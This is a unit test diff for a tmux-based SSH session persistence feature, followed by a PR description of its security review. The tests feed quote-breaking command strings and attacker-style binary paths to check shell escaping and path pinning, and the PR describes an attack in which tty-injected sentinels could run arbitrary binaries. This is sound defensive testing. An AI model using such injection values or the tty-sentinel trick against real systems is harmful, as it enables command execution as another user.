+++ b/tests/unit/ssh-tmux.test.ts
@@ -1,0 +1,135 @@
+// tests/unit/ssh-tmux.test.ts
+//
+// #242: tmux persistence wrapper. `-A` makes reconnect the IDENTICAL code
+// path (attach if the session exists, else create it) — dropping it would
+// make every reconnect spawn a SECOND claude inside a brand-new session
+// instead of resuming the live one.
+//
+// #242 round-3 correction (I3): buildTmuxLaunchCommand no longer takes a
+// wire-reported `tmuxBin` at all -- it picks ONE of two fixed, host-authored
+// literal tokens (ON_PATH_TMUX_BIN_EXPR / STAGED_TMUX_BIN_EXPR) purely off
+// the `staged` boolean. `isPinnedTmuxPath`/`assertPinnedTmuxPath` (the
+// validate-then-trust gate that used to sit in front of a tier-1/2 tmuxBin)
+// are deleted along with their tests -- there is no longer a wire-reported
+// path reaching this sink for either tier to validate.
+import { describe, it, expect } from 'vitest'
+import { buildTmuxLaunchCommand, buildSshClaudeFlags, shouldAddContinueFlag, ON_PATH_TMUX_BIN_EXPR, STAGED_TMUX_BIN_EXPR } from '../../src/main/ssh-tmux'
+
+const base = {
+  sessionId: 'sid-1',
+  innerCmd: 'CLAUDE_CODE_DISABLE_MOUSE_CLICKS=1 claude --settings ~/.claude/settings-sid-1.json',
+  staged: false,
+}
+
+describe('buildTmuxLaunchCommand', () => {
+  it('builds new-session -A -s ccc-<sid> <cmd>, using ON_PATH_TMUX_BIN_EXPR for staged: false', () => {
+    const cmd = buildTmuxLaunchCommand(base)
+    expect(cmd).toBe(`${ON_PATH_TMUX_BIN_EXPR} new-session -A -s ccc-sid-1 '${base.innerCmd}'`)
+  })
+
+  it('uses STAGED_TMUX_BIN_EXPR for staged: true', () => {
+    const cmd = buildTmuxLaunchCommand({ ...base, staged: true })
+    expect(cmd).toBe(`${STAGED_TMUX_BIN_EXPR} new-session -A -s ccc-sid-1 '${base.innerCmd}'`)
+  })
+
+  it('carries -A so reconnect attaches instead of creating a second session', () => {
+    const cmd = buildTmuxLaunchCommand(base)
+    expect(cmd).toMatch(/new-session\s+-A\s+-s\s+ccc-/)
+  })
+
+  it('sanitizes a session id containing spaces/quotes into the tmux session name', () => {
+    const cmd = buildTmuxLaunchCommand({ ...base, sessionId: `sid with 'quote' and space` })
+    // Same [^a-zA-Z0-9_-] -> '_' rule as safeSid in ssh-shim.ts.
+    expect(cmd).toContain('-s ccc-sid_with__quote__and_space ')
+    // No raw space or quote reached the -s argument itself.
+    const sName = cmd.split('-s ')[1].split(' ')[0]
+    expect(sName).toBe('ccc-sid_with__quote__and_space')
+    expect(sName).not.toMatch(/['"\s]/)
+  })
+
+  it('keeps the env prefix INSIDE the single-quoted tmux command argument', () => {
+    // The env vars must reach claude via tmux's own `sh -c`, not as bare
+    // tokens preceding the tmux binary token (tmux's launch environment is
+    // NOT sourced from this command line).
+    const cmd = buildTmuxLaunchCommand(base)
+    const quotedArg = `'${base.innerCmd}'`
+    const idx = cmd.indexOf(quotedArg)
+    expect(idx).toBeGreaterThan(-1)
+    // Nothing before the tmux binary token, and the env var itself only
+    // appears inside the quoted argument (never as a bare leading token).
+    expect(cmd.indexOf('CLAUDE_CODE_DISABLE_MOUSE_CLICKS')).toBe(idx + 1)
+    expect(cmd.startsWith(ON_PATH_TMUX_BIN_EXPR)).toBe(true)
+  })
+
+  it('single-quotes an innerCmd containing a single quote without breaking out of the argument', () => {
+    const innerCmd = `echo 'hi' && say "done"`
+    const cmd = buildTmuxLaunchCommand({ ...base, innerCmd })
+    const marker = '-s ccc-sid-1 '
+    const quotedArg = cmd.slice(cmd.indexOf(marker) + marker.length)
+    expect(quotedArg.startsWith("'")).toBe(true)
+    expect(quotedArg.endsWith("'")).toBe(true)
+    // Reverse the POSIX single-quote escaping (strip outer quotes, undo
+    // every '\'' -> literal ') to prove the remote shell parses this back
+    // into the ORIGINAL string, rather than hand-writing the expected
+    // escaped form (fragile and easy to get wrong by hand).
+    const unescaped = quotedArg.slice(1, -1).split(`'\\''`).join(`'`)
+    expect(unescaped).toBe(innerCmd)
+  })
+})
+
+// #242 round-3 correction (I3), BLOCKER. Round-2's fix already established
+// that a staged (tier-3/4) path is never read off the wire for this sink;
+// this generalizes the SAME principle to tier 1/2 -- `isPinnedTmuxPath`'s
+// own doc comment admitted it could not defeat an attacker-controlled
+// absolute path with no traversal (a real PATH tmux can legitimately live
+// almost anywhere), so validating THEN trusting a wire-reported path was
+// never a durable fix for tier 1/2 either. Mutation to prove this can fail:
+// change buildTmuxLaunchCommand to accept and embed a caller-supplied
+// tmuxBin again for `staged: false` -- both assertions below then fail,
+// because the command would no longer be independent of any operand the
+// caller passes.
+describe('buildTmuxLaunchCommand never reads a caller-supplied tmux path (#242 finding I3, BLOCKER)', () => {
+  it('ignores anything extra on the input object -- staged: false always emits ON_PATH_TMUX_BIN_EXPR', () => {
+    const cmd = buildTmuxLaunchCommand({ ...base, staged: false, tmuxBin: '/tmp/.x/tmux' } as never)
+    expect(cmd).not.toContain('/tmp/.x/tmux')
+    expect(cmd.startsWith(ON_PATH_TMUX_BIN_EXPR)).toBe(true)
+  })
+
+  it('ignores anything extra on the input object -- staged: true always emits STAGED_TMUX_BIN_EXPR', () => {
+    const cmd = buildTmuxLaunchCommand({ ...base, staged: true, tmuxBin: '/tmp/.claude/bin/tmux' } as never)
+    expect(cmd).not.toContain('/tmp/.claude/bin/tmux')
+    expect(cmd.startsWith(STAGED_TMUX_BIN_EXPR)).toBe(true)
+  })
+})
+
+// #242 tier 5: `--continue` on a reconnect, gated OFF whenever tmux is in
+// play (the `-A` reattach already IS the reconnect path in that case; see
+// buildSshClaudeFlags's doc comment for why a second claude inside the same
+// attached pane would be wrong). Both directions are separate mutations a
+// single test cannot catch: dropping the `!tmuxInPlay` gate only shows up
+// with tmux present, and dropping the `reconnect` gate only shows up with
+// tmux absent -- hence two dedicated tests rather than one table-driven one.
+describe('buildSshClaudeFlags / shouldAddContinueFlag (#242 tier 5)', () => {
+  it('adds --continue on a reconnect with no tmux in play', () => {
+    expect(shouldAddContinueFlag({ reconnect: true, tmuxInPlay: false })).toBe(true)
+    expect(buildSshClaudeFlags({ reconnect: true, tmuxInPlay: false })).toBe('--continue')
+  })
+
+  // Mutation this catches: dropping `!input.tmuxInPlay` from the gate (e.g.
+  // `return input.reconnect`) would make this fail -- tmux's own `-A` already
+  // reattaches to the live claude process, so a SECOND `--continue` would
+  // start a second claude inside that same attached pane.
+  it('does NOT add --continue on a reconnect when tmux IS in play', () => {
+    expect(shouldAddContinueFlag({ reconnect: true, tmuxInPlay: true })).toBe(false)
+    expect(buildSshClaudeFlags({ reconnect: true, tmuxInPlay: true })).toBe('')
+  })
+
+  // Mutation this catches: dropping `input.reconnect` from the gate (e.g.
+  // `return !input.tmuxInPlay`) would make this fail -- a session's FIRST
+  // connect has no prior conversation to continue.
+  it('does NOT add --continue on a first connect (reconnect: false), tmux or not', () => {
+    expect(shouldAddContinueFlag({ reconnect: false, tmuxInPlay: false })).toBe(false)
+    expect(shouldAddContinueFlag({ reconnect: false, tmuxInPlay: true })).toBe(false)
+    expect(buildSshClaudeFlags({ reconnect: false, tmuxInPlay: false })).toBe('')
+  })
+})


### PR DESCRIPTION
Closes #242.

## What

SSH sessions don't survive a dropped connection — local sessions have no transport to lose, but a
remote session dies the moment the link does, killing Claude mid-turn. This wraps the remote launch
in tmux so the session detaches on link loss and reattaches on reconnect, staging a static tmux
binary when the remote doesn't have one.

Launch becomes `tmux new-session -A -s ccc-<sid> -- <claude…>`; reconnect is the identical code
path (`-A` attaches instead of creating). A 5-tier detection ladder resolves tmux:

1. `command -v tmux` on the remote
2. `~/.claude/bin/tmux` staged by an earlier session
3. curl/wget the pinned upstream static build (tmux-builds v3.7b), sha256-verified
4. base64-push the archive down the PTY when the remote has no egress
5. `--continue` degradation when no tier works — the conversation still resumes

Plus `ServerAliveInterval=30 / ServerAliveCountMax=3` on every platform so a dead-but-open TCP
connection actually surfaces and reconnect can take over. Statusline under tmux is handled without
`allow-passthrough` — the shim resolves the outer client tty.

## Security — adversarial-review PASS (ADR-009)

This touches PTY argv construction, remote shell command construction, a new HTTPS download + cache,
and the IPC surface, so it went through the full adversarial pass. It found and closed a **BLOCKER**:
CCC parsed a `tmux=<path>` sentinel out of the raw PTY byte stream and executed that path, so anyone
who could merely write bytes to the remote tty (a co-tenant's `wall`, an MOTD script) could make CCC
run a binary of their choosing as the SSH user. Closed by two controls:

- **Path-pinning** (the durable control, independent of any secret): a staged path must resolve
  host-side to the user's own `~/.claude/bin/tmux`; no path off the wire reaches the launch sink on
  any tier.
- **Per-session nonce** (second layer): every sentinel must carry a per-spawn 96-bit CSPRNG nonce,
  closing the write-only attacker class. Documented honestly as defeated by a tty *reader* — which
  implies same-uid/root, i.e. already-code-execution — hence path-pinning is load-bearing.

Two MAJORs also closed: `sessionId` was interpolated raw into the remote setup script (now
`safeSid` + charset-gated), and `CCC_TMUX_BIN` was baked empty for staged sessions (now rewritten
after staging). Full narrative and the review rounds are in the `CONTEXT.d/2026-08-08-242-*`
fragments.

## Relationship to #241 / #265

#241 (win32 ControlMaster) landed independently in beta.9 via #260; this branch was rebased onto
that and the superseded #241 commits dropped. The hardening the #241 adversarial pass surfaced
(charset-gate host/username, sink guard in `buildSshArgs`, call-site test) is **not** in beta and is
tracked separately as #265 — this PR carries only the `sessionId` half, which the statusline sink
forced.

## Gate

- `npm run typecheck` clean
- `npx vitest run --no-cache` — 4367 pass, 13 skipped, 0 fail
- `node scripts/gen-changelog.js --check` — in sync

## NOT yet done — this gates the MERGE, not this PR

**Not desktop-tested against a real remote.** Tiers 3/4 (remote self-download, base64 PTY push) have
never run against a live host. The acceptance test before merge: SSH in → kill the network mid-turn
→ reconnect → the same tmux session reattaches with its work intact; and a no-tmux/no-egress remote
degrades cleanly to `--continue`. Do not promote to a release until that passes.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
